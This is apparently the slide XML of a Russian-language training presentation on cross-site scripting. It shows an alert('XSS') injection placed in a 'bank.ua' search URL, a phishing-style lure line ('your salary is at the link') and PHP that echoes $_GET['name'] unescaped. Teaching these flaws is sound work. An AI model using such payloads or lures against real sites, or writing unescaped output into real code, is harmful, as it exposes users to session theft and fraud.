          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1388525" y="4079825"/>
            <a:ext cx="1099200" cy="52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1800"/>
              <a:t>bank.ua</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2226725" y="4079825"/>
            <a:ext cx="6037800" cy="525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ru">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=')%3Balert('XSS')%3Bvar b=('</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394175" y="3546425"/>
            <a:ext cx="6954000" cy="42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ru" sz="1800"/>
              <a:t>Добрый день! Ваша заработная плата находится по ссылке</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="125" name="Shape 125"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3508975" y="2737550"/>
            <a:ext cx="2963400" cy="18900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="44546A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Shape 126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661625" y="1174375"/>
            <a:ext cx="2310550" cy="144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2.JPG" id="131" name="Shape 131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Shape 132"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870250" y="102400"/>
            <a:ext cx="7641499" cy="4938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descr="2.JPG" id="137" name="Shape 137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Shape 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675125" y="0"/>
            <a:ext cx="8469000" cy="925800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030565" y="155351"/>
            <a:ext cx="7085700" cy="45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ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Причина возникновения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486100" y="942725"/>
            <a:ext cx="7336200" cy="247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ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;?php</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if(!array_key_exists("name",$_GET) | |$_GET['name'] == NULL || $_GET['name']==''){</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$isempty=true;</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             </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else{</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echo '&lt;pre&gt;';</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echo 'Hello' . $_GET['name'];</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echo '&lt;/pre&gt;';</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a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141" name="Shape 141"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182625" y="1532350"/>
            <a:ext cx="4061125" cy="3534950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784250" y="3991875"/>
            <a:ext cx="3221700" cy="416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ru" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
              </a:rPr>
              <a:t>')%3Balert('XSS')%3Bvar b=('</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1704535">
            <a:off x="3800300" y="3600332"/>
            <a:ext cx="1851350" cy="191950"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000"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